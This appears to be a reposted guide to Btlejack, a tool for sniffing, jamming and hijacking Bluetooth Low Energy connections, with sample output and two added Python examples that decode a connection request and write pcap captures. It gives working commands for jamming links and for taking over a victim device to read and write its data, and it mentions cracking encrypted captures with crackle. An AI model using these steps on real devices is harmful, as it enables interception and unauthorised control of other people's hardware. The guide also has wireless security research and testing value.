Btlejack provides everything you need to sniff, interfere with, and hijack Bluetooth Low Energy (BLE) connections. It relies on one or more BBC Micro:Bits running a dedicated firmware. Adafruit's Bluefruit LE Sniffer and the nRF51822 evaluation kit are also supported, since support for these devices has been added.
The current version of the tool (2.0) supports BLE 4.x and 5.x. Support for BLE 5.x is limited, however: only the 1 Mbps uncoded PHY is supported, and channel map updates are not handled.
Environment Requirements
You need a UNIX-based system (e.g., a Raspberry Pi). If you use BBC Micro:Bits, you need one to three of them (three is recommended) and a free USB port for each. The Micro:Bit draws very little power, so the recommended three units can be powered from a single USB port through a passive hub.
If you connect three Micro:Bits at once, Btlejack can sniff all three advertising channels simultaneously, giving you more opportunities to capture connection requests.
Installation
First, install the btlejack Python3 client software using Pip:
$ sudo pip3 install btlejack
Then connect each Micro:Bit to the computer with a USB cable, mount the mass storage device it exposes (the mount point name must contain MICROBIT), and run:
$ btlejack -i
This programs every Micro:Bit connected to your computer with the Btlejack firmware, using the firmware version that matches the current client software; it is therefore highly recommended to repeat this step every time you update Btlejack.
If you are using the Bluefruit LE Sniffer or the nRF51822 evaluation kit, flash the firmware onto the device with an external SWD programmer.
Keep your devices connected!
Note: This only works with POSIX-compliant systems.
Usage
Btlejack can:
Use various devices
Sniff existing BLE connections
Sniff new BLE connections
Interfere with existing BLE connections
Hijack existing BLE connections
Export captured packets in various PCAP formats
Specify Devices to Use
Btlejack normally tries to detect and use connected compatible devices automatically (currently only the Micro:Bit), but since the firmware can be modified to run on other nRF51822-based boards, it also provides an option to name the devices explicitly.
The -d option lets you specify one or more devices for Btlejack to use. Note that it disables automatic device detection; repeat it once per device:
$ btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
Sniff Existing Connections
First, use btlejack to find the existing connections of the target:
$ btlejack -s
BtleJack version 1.1

[i] Enumerating existing connections ...
[ - 54 dBm] 0xcd91d517 | pkts: 1
[ - 46 dBm] 0xcd91d517 | pkts: 2
The first value (in dBm) is the received signal strength; the higher it is, the better the connection can be sniffed.
The second value (in hex) is the access address, a 32-bit value that identifies the link between two BLE devices.
The last value is the number of packets seen with this access address; the higher it is, the more likely the access address belongs to a real connection.
Then, use the -f option to track a specific connection:
$ btlejack -f 0xdda4845e
BtleJack version 1.1

[i] Detected sniffers:
 > Sniffer #0: fw version 1.1
[i] Synchronizing with connection 0xdda4845e ...
✓ CRCInit: 0x2a035e
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 15
[i] Synchronized, packet capture in progress ...
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70
LL Data: 02 07 03 00 04 00 0a 03 00
LL Data: 0a 08 04 00 04 00 0b 5a 69 70
If you use more than one Micro:Bit, Btlejack parallelizes some sniffing operations to speed up the recovery of the connection parameters.
Sniff New Connections
The -c option takes the target's BD address, or the keyword any to capture any new connection that is established:
$ btlejack -c any
BtleJack version 1.1

[i] Detected sniffers:
 > Sniffer #0: version 1.1
 > Sniffer #1: version 1.1
LL Data: 05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b
[i] Got CONNECT_REQ packet from 55:c5:95:6f:b4:df to 40:23:99:f6:0a:c0
 |-- Access Address: 0x0a2f7b1d
 |-- CRC Init value: 0x93f49a
 |-- Hop interval: 39
 |-- Hop increment: 11
 |-- Channel Map: 1fffffffff
 |-- Timeout: 20000 ms
LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 03 09 08 0f 00 00 00 00 00 00 00
LL Data: 0b 06 0c 08 0f 00 09 41
LL Data: 03 06 0c 07 1d 00 d3 07
Alternatively, you may also want to specify the target BD address:
$ btlejack -c 03:e1:f0:00:11:22
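Everything Btlejack prints under "Got CONNECT_REQ packet" is carried in the clear inside that 36-byte PDU, which is why catching a single connection request is enough to follow the whole connection; the link layer offers no confidentiality of its own, and only LE encryption of the data protects the payloads. The following Python is an added example (not Btlejack's code) that decodes the exact CONNECT_REQ bytes shown above according to the Bluetooth Core Specification field layout (CONNECT_REQ, called CONNECT_IND in BLE 5.x) and then derives the first data channels that Channel Selection Algorithm #1 produces from the recovered channel map and hop increment, so you can see how the values from the "Sniff Existing Connections" output and the CONNECT_REQ fields relate. Function and key names are my own choices.

```python
import struct

# CONNECT_REQ "LL Data" bytes exactly as Btlejack printed them in the capture above
CONNECT_REQ_HEX = (
    "05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 "
    "01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b"
)

PDU_TYPE_CONNECT_REQ = 0x05


def fmt_addr(raw):
    """Render a 6-byte device address; the air interface sends the least significant byte first."""
    return ":".join(f"{b:02x}" for b in reversed(raw))


def parse_connect_req(pdu):
    """Decode a CONNECT_REQ (CONNECT_IND in BLE 5.x) advertising PDU into its fields.

    Layout after the 2-byte header: InitA(6) AdvA(6) AA(4) CRCInit(3) WinSize(1)
    WinOffset(2) Interval(2) Latency(2) Timeout(2) ChM(5) Hop/SCA(1) = 34 bytes.
    """
    if len(pdu) != 36:
        raise ValueError(f"CONNECT_REQ must be 36 bytes, got {len(pdu)}")
    header, length = pdu[0], pdu[1]
    if header & 0x0F != PDU_TYPE_CONNECT_REQ or length != 34:
        raise ValueError("not a CONNECT_REQ PDU")
    body = pdu[2:]
    (access_address,) = struct.unpack_from("<I", body, 12)
    win_offset, interval, latency, timeout = struct.unpack_from("<HHHH", body, 20)
    return {
        "tx_add_random": bool(header & 0x40),   # initiator address type (0 = public)
        "rx_add_random": bool(header & 0x80),   # advertiser address type (0 = public)
        "init_a": fmt_addr(body[0:6]),
        "adv_a": fmt_addr(body[6:12]),
        "access_address": access_address,
        "crc_init": int.from_bytes(body[16:19], "little"),
        "win_size_ms": body[19] * 1.25,
        "win_offset_ms": win_offset * 1.25,
        "hop_interval": interval,               # units of 1.25 ms (39 -> 48.75 ms)
        "interval_ms": interval * 1.25,
        "slave_latency": latency,
        "timeout_ms": timeout * 10,             # supervision timeout, units of 10 ms
        "channel_map": int.from_bytes(body[28:33], "little"),
        "hop_increment": body[33] & 0x1F,
        "sca": body[33] >> 5,                   # master sleep clock accuracy code
    }


def used_channels(channel_map):
    """Data channels (0-36) whose bit is set in the 37-bit channel map."""
    return [ch for ch in range(37) if (channel_map >> ch) & 1]


def csa1_channel_sequence(channel_map, hop_increment, count, last_unmapped=0):
    """First `count` data channels visited by Channel Selection Algorithm #1.

    Per connection event: unmapped = (last + hop) mod 37; if that channel is in
    the map it is used, otherwise it is remapped to used[unmapped mod len(used)].
    """
    used = used_channels(channel_map)
    if not used:
        raise ValueError("channel map has no usable channels")
    sequence = []
    last = last_unmapped
    for _ in range(count):
        unmapped = (last + hop_increment) % 37
        if (channel_map >> unmapped) & 1:
            sequence.append(unmapped)
        else:
            sequence.append(used[unmapped % len(used)])
        last = unmapped
    return sequence


if __name__ == "__main__":
    info = parse_connect_req(bytes.fromhex(CONNECT_REQ_HEX.replace(" ", "")))
    for key, value in info.items():
        print(f"{key:>16}: {value}")
    print("first 10 channels:",
          csa1_channel_sequence(info["channel_map"], info["hop_increment"], 10))
```

With the page's bytes the decoder reproduces Btlejack's summary (access address 0x0a2f7b1d, CRCInit 0x93f49a, hop interval 39, hop increment 11, channel map 0x1fffffffff, timeout 20000 ms) and also exposes the fields Btlejack does not print, such as the window offset and the slave latency; a latency of zero is what the "Hijack Existing BLE 5 Connections" section below refers to.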
Interfere with Connections
Once a connection has been identified by its access address, you can use the -j option to interfere with it:
$ btlejack -f 0x129f3244 -j
Hijack BLE Connections
The -t option hijacks an existing connection. Once the connection is hijacked, Btlejack opens a prompt from which you can interact with the hijacked device.
First, hijack the existing connection:
$ btlejack -f 0x9c68fd30 -t -m 0x1fffffffff
BtleJack version 1.1

[i] Using cached parameters (created on 2018-08-11 01:48:24)
[i] Detected sniffers:
 > Sniffer #0: fw version 1.1
[i] Synchronizing with connection 0x9c68fd30 ...
✓ CRCInit: 0x81f733
✓ Channel map is provided: 0x1fffffffff
✓ Hop interval = 39
✓ Hop increment = 9
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours
btlejack>
Then use the following commands to interact with the device:
- discover: enumerates services and characteristics, giving you all information about them
- write: writes data to a specific value handle
- read: reads data from a specific value handle
- ll: sends raw link layer packets (for ninjas)
Discover Command
The discover command will send and receive Bluetooth LE packets and retrieve all service UUIDs and parameters, as well as characteristic UUIDs and parameters:
btlejack> discover
start: 0001 end: 0005
start: 0014 end: 001a
start: 0028 end: ffff
Discovered services:
Service UUID: 1801
  Characteristic UUID: 2a05 | handle: 0002 | properties: indicate (20)
    value handle: 0003
Service UUID: 1800
  Characteristic UUID: 2a04 | handle: 0019 | properties: read (02)
    value handle: 001a
  Characteristic UUID: 2a00 | handle: 0015 | properties: read (02)
    value handle: 0016
  Characteristic UUID: 2a01 | handle: 0017 | properties: read (02)
    value handle: 0018
Service UUID: 1824
  Characteristic UUID: 2abc | handle: 0029 | properties: write indicate (28)
    value handle: 002a
Read Command
The read command takes a single parameter, which is the value handle corresponding to the characteristic from which to read:
btlejack> read 0x16
read>> 4c 47 20 77 65 62 4f 53 20 54 56
Write Command
The write command takes three parameters:
btlejack> write <value handle> <data format> <data>
Supported data formats:
hex: hexadecimal data (e.g., “414261”)
str: text string, can be enclosed in double quotes
LL Command
The last command allows you to send Bluetooth Low Energy link layer PDUs, given in hexadecimal, in the format described in Volume 6, Part B, Chapter 2.4 of the Bluetooth Core Specification.
PCAP File Export
One interesting feature of Btlejack is the ability to export captured data to PCAP files.
Btlejack supports the following DLT formats:
DLT_BLUETOOTH_LE_LL_WITH_PHDR
DLT_NORDIC_BLE
DLT_BLUETOOTH_LE_LL
You can specify the output file using the -o option, and the output format can be specified using the -x option. Valid format values are: ll_phdr, nordic, or pcap (default).
$ btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap
The ll_phdr export type is particularly useful when sniffing encrypted connections, because it is the format crackle also reads. If you want to capture encrypted connections and analyze them further with crackle, this is the format to choose.
You may also need to use the -s option to tell crackle to use a specific cracking strategy:
$ crackle -i some.pcap -s 1
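Since the ll_phdr format is the one other tools agree on, it helps to know what it contains. The following Python is an added example (not Btlejack's own code): it writes a classic pcap file whose link type is DLT_BLUETOOTH_LE_LL_WITH_PHDR (libpcap value 256), wraps one LL Data PDU taken from the 0xdda4845e capture above in the 10-byte pseudo-header that link type requires (the field layout and flag bits are as I read them from the libpcap link-type description), reads the file back and decodes the record. The channel number, RSSI, timestamp, CRC bytes, output file name and all function names are constructed assumptions, not values from the page; the other two link-type constants (251 for pcap, 272 for nordic) are listed only for reference.

```python
import io
import struct

# libpcap link-layer types behind Btlejack's three -x export formats
LINKTYPE_BLUETOOTH_LE_LL = 251             # -x pcap (default)
LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR = 256   # -x ll_phdr
LINKTYPE_NORDIC_BLE = 272                  # -x nordic

# Flag bits of the LE_LL_WITH_PHDR pseudo-header, per the libpcap link-type description
PHDR_DEWHITENED = 0x0001
PHDR_SIGNAL_VALID = 0x0002
PHDR_NOISE_VALID = 0x0004
PHDR_DECRYPTED = 0x0008
PHDR_REF_AA_VALID = 0x0010
PHDR_CRC_CHECKED = 0x0400
PHDR_CRC_VALID = 0x0800

PCAP_MAGIC = 0xA1B2C3D4
PHDR_FMT = "<BbbBIH"                  # rf_channel, signal dBm, noise dBm, AA offenses, ref AA, flags
PHDR_LEN = struct.calcsize(PHDR_FMT)  # 10 bytes


def write_pcap(fp, linktype, records):
    """Write a classic little-endian pcap; records are (ts_sec, ts_usec, bytes) tuples."""
    fp.write(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, linktype))
    for ts_sec, ts_usec, data in records:
        fp.write(struct.pack("<IIII", ts_sec, ts_usec, len(data), len(data)))
        fp.write(data)


def read_pcap(fp):
    """Return (linktype, [(ts_sec, ts_usec, bytes), ...]) from a classic pcap stream."""
    magic, _major, _minor, _tz, _sig, _snap, linktype = struct.unpack("<IHHiIII", fp.read(24))
    if magic != PCAP_MAGIC:
        raise ValueError("only little-endian classic pcap is handled here (not pcapng)")
    packets = []
    while True:
        rec = fp.read(16)
        if len(rec) < 16:
            break
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack("<IIII", rec)
        data = fp.read(incl_len)
        if len(data) < incl_len:
            raise ValueError("truncated packet record")
        packets.append((ts_sec, ts_usec, data))
    return linktype, packets


def build_le_ll_with_phdr(rf_channel, signal_dbm, access_address, pdu, crc, flags):
    """Assemble one LE_LL_WITH_PHDR record: pseudo-header + access address + PDU + CRC."""
    phdr = struct.pack(PHDR_FMT, rf_channel, signal_dbm, 0, 0, access_address, flags)
    return phdr + struct.pack("<I", access_address) + bytes(pdu) + bytes(crc)


def parse_le_ll_with_phdr(data):
    """Split an LE_LL_WITH_PHDR record into pseudo-header fields and link-layer parts."""
    rf_channel, signal, _noise, _offenses, _ref_aa, flags = struct.unpack_from(PHDR_FMT, data, 0)
    ll = data[PHDR_LEN:]
    if len(ll) < 4 + 2 + 3:
        raise ValueError("link-layer packet too short for AA + header + CRC")
    (access_address,) = struct.unpack_from("<I", ll, 0)
    pdu = ll[4:-3]
    return {
        "rf_channel": rf_channel,
        "signal_dbm": signal,
        "flags": flags,
        "access_address": access_address,
        "llid": pdu[0] & 0x03,   # 1 = continuation/empty, 2 = start of L2CAP message, 3 = LL control
        "pdu": pdu,
        "crc": ll[-3:],
    }


# Constructed sample: the first LL Data PDU from the -f 0xdda4845e capture above, with a
# constructed channel, RSSI, timestamp and a placeholder CRC (Btlejack would record real ones).
SAMPLE_AA = 0xDDA4845E
SAMPLE_PDU = bytes.fromhex("0207030004000a0300")
SAMPLE_CRC = b"\x00\x00\x00"
SAMPLE_RECORD = build_le_ll_with_phdr(7, -54, SAMPLE_AA, SAMPLE_PDU, SAMPLE_CRC,
                                      PHDR_DEWHITENED | PHDR_SIGNAL_VALID | PHDR_REF_AA_VALID)


def roundtrip(fp=None):
    """Write the sample as an ll_phdr capture, read it back and return the decoded record."""
    fp = fp if fp is not None else io.BytesIO()
    write_pcap(fp, LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR, [(1533952104, 0, SAMPLE_RECORD)])
    fp.seek(0)
    linktype, packets = read_pcap(fp)
    if linktype != LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR or len(packets) != 1:
        raise ValueError("unexpected capture contents")
    return parse_le_ll_with_phdr(packets[0][2])


if __name__ == "__main__":
    with open("capture.ll_phdr.pcap", "w+b") as f:   # constructed output file name
        rec = roundtrip(f)
    print(f"AA 0x{rec['access_address']:08x} on channel {rec['rf_channel']} "
          f"({rec['signal_dbm']} dBm), LLID {rec['llid']}, PDU {rec['pdu'].hex()}")
```

The file written by the script opens in Wireshark as a "Bluetooth Low Energy Link Layer" capture; since the CRC placeholder is constructed, the flags deliberately leave PHDR_CRC_CHECKED clear so that a consumer does not treat it as verified.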
Connection Cache
Btlejack uses a connection cache that stores some connection-related values to speed up later runs. This cache can cause problems, especially when an access address has been seen before and stale cached parameters are reused for a different connection.
You can refresh this cache using the -z option:
$ btlejack -z
Use Wireshark to Dump Real-Time Packets
Btlejack 2.0 introduces a new -w option that allows you to specify a FIFO path (existing or not) for real-time analysis of packets:
$ btlejack -c any -w /tmp/blepipe
You can even use both FIFO and output files simultaneously:
$ btlejack -c any -w /tmp/blepipe -o blepackets.pcap
Using Btlejack on Raspberry Pi
If you previously enabled virtual Ethernet (RNDIS) over USB, for example to set up a Raspberry Pi Zero W via USB, you need to disable it again (i.e., remove dtoverlay=dwc2 from /boot/config.txt and modules-load=dwc2,g_ether from /boot/cmdline.txt, then reboot with sudo reboot); otherwise it interferes with the sniffer's USB connection.
Bluetooth LE 5 & 5.1 Support
This version supports Bluetooth Low Energy 5 and 5.1, in particular the new channel selection algorithm introduced in version 5 (CSA #2). Due to hardware limitations, however, it can only sniff, interfere with, and hijack connections that use the 1 Mbps uncoded PHY.
Additionally, note that the current implementation of CSA #2 included in Btlejack does not support channel map updates.
Sniff New BLE 5 Connections
Btlejack automatically detects which channel selection algorithm is in use, so nothing special is required: capture packets as usual.
Sniff Existing BLE 5 Connections
Sniffing an existing BLE 5 connection (1 Mbps uncoded PHY only) is not much harder. First, mark the target as a BLE 5 connection with the -5 option. Note that there is no way to tell whether an existing connection uses CSA #2 or CSA #1, so you must try both techniques until one works.
$ btlejack -f 0x11223344 -5
Then, Btlejack will recover the channel map and hop interval values being used for this connection:
$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160
Then it will attempt to recover the PRNG counter value for this connection:
$ btlejack -f 0x11223344 -5
[i] Synchronizing with connection 0x11223344 ...
✓ CRCInit: 0x40d64f
✓ Channel Map = 0x1fffffffff
✓ Hop interval = 160
✓ CSA2 PRNG counter = 5137
[i] Synchronized, packet capture in progress ...
Once done, Btlejack will synchronize with this connection and process packets.
Interfere with Existing BLE 5 Connections
There is nothing new here, except you must specify the BLE 5 connection to attack using the -5 option.
Note that you can speed this attack up by supplying the channel map and hop interval values with the -m and -p flags, respectively. Both must be provided together, otherwise it will not work.
Hijack Existing BLE 5 Connections
At this time, I have not managed to hijack a BLE 5 connection, as this attack is time-sensitive. My BLE 5 device uses zero latency, so it introduces no delay, and the attack fails.
When I get hold of some other legitimate BLE 5 devices, I will improve this.
References: GitHub. Compiled by FreeBuf editor secist; please credit FreeBuf.COM when reposting.